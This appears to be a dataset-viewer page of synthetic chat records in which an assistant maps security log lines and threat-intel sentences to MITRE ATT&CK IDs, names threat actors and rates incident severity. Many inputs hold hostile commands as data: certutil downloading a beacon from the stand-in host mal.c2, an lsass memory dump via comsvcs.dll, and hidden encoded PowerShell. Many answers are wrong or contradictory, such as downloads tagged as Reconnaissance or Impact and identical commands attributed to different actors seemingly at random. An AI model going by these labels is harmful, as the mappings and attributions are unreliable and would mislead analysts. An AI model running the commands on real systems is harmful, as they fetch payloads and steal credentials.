messages listlengths 2 2 |
|---|
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.83.133.140",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 993 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"con... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.88.135.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0002... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-WBZ75G6QZO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: NOKKI can gather information on the victim IP address.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2963 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.154.219.19",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T15... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-N3DWOSYEFF)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Collection",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-GLLEOQ8BZ3)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.77.139.50",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0007\"], \"technique... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Astaroth has used malicious VBS e-mail attachments for execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-BM91XKRY55)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Execution",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-YC2MSNO0VR)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Persistence",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.28.153.185",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"tech... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-UMEY71QO5B)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Command and Control, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIN7 has used WMI to install malware on targeted systems.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim",
"role": "user"
},
{
"conten... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2894 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ShimRat communicated over HTTP and HTTPS with C2 servers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-VKHJVVZJZH)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Execution, Lateral Movement",
"role": "user"
},... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-6DL4I09PE0)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Impact",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\", \"T1568.003\"]}",
"role"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.174.253.81",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0043\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1999 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-38KLOXLUG5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-5C0GBQ4FVA)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3632 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2630 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-LXINJDF1KK)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Defense Evasion, Command and Control",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-K402DQ65LS)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Any potential changes cannot take effect until every registered filter acknowledges validation.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556.002... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.68.4.148",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2018 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: COM and execution in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.101.150.140",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-M364PX5F8G)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3496 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.42.15.227",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0005\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1195 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.41.124.233",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1546... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3072 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.52.118.61",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"],... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: After compromising a victim, Poseidon Group discovers all running services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-DCR2QZUYNG)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may gather information about the victim's network topology that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.004\"]... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for API calls that may acquire credentials from web browsers by reading files specific to the target browser.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Kwampirs collects a list of accounts with the command net users.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087\", \"T1087.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-8NN1SOD6T3)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Impact, Credential Access",
"role": "user"
},
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: POWRUNER may query the Registry by running reg query on a victim.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.33.51.190",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-DOE54DH7GA)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access, Initial Access",
"role": "user"
}... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Neoichor can identify the system language on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\", \"T1614.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity.",
"role": "user"
},
{
"content": "{\"tac... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.51.147.132",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-IX1F6IBZ9O)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Critic... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-YWPRT9B7C1)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Impact",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3867 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Watches uninstall time, checks time diff (local time vs internet time)",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1124\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FlawedAmmyy has used SEAL encryption during the initial C2 handshake.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2711 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.18.89.156",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1546.003... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-TQWD4XXW0U)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Collection, Persistence",
"role": "user"
},
{
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-EFANE5CWIN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.4.177.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1546.003\"]}",
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.176.165.252",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-CIHZXKFKC1)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Command and Control, Execution",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 694 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-054UPTYPLY)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.32.81.140",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0040\", \"TA0003\"], ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.25.193.114",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0009\"], \"techn... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may use port knocking to hide open ports used for persistence or command and control.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0011\"], \"techniques\": [\"T1205\", \"T1205.001... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1234 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.126.212.231",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0002\"]... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Pupy can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.001\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-K7NX7FD8G4)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SILENTTRINITY can use System.Security.AccessControl namespaces to retrieve domain user information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.002\", \"T1087\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-BW6OHCLMF5)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.84.73.219",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T102... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1534 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.138.47.224",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-XCYODFP0TW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-F96YT1NCQ7)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Lateral Movement",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-OLE59S7YAF)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\", \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-H914IFPRQQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Initial Access, Collection",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lizar can execute PE files in the address space of the specified process.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.002\", \"T1055\"]}",
"role": "ass... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2702 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.175.218.242",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3359 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.131.216.33",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0002\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3780 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.52.155.136",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1546.003\"]}",
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.59.187.77",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0005\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1518 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.115.72.168",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.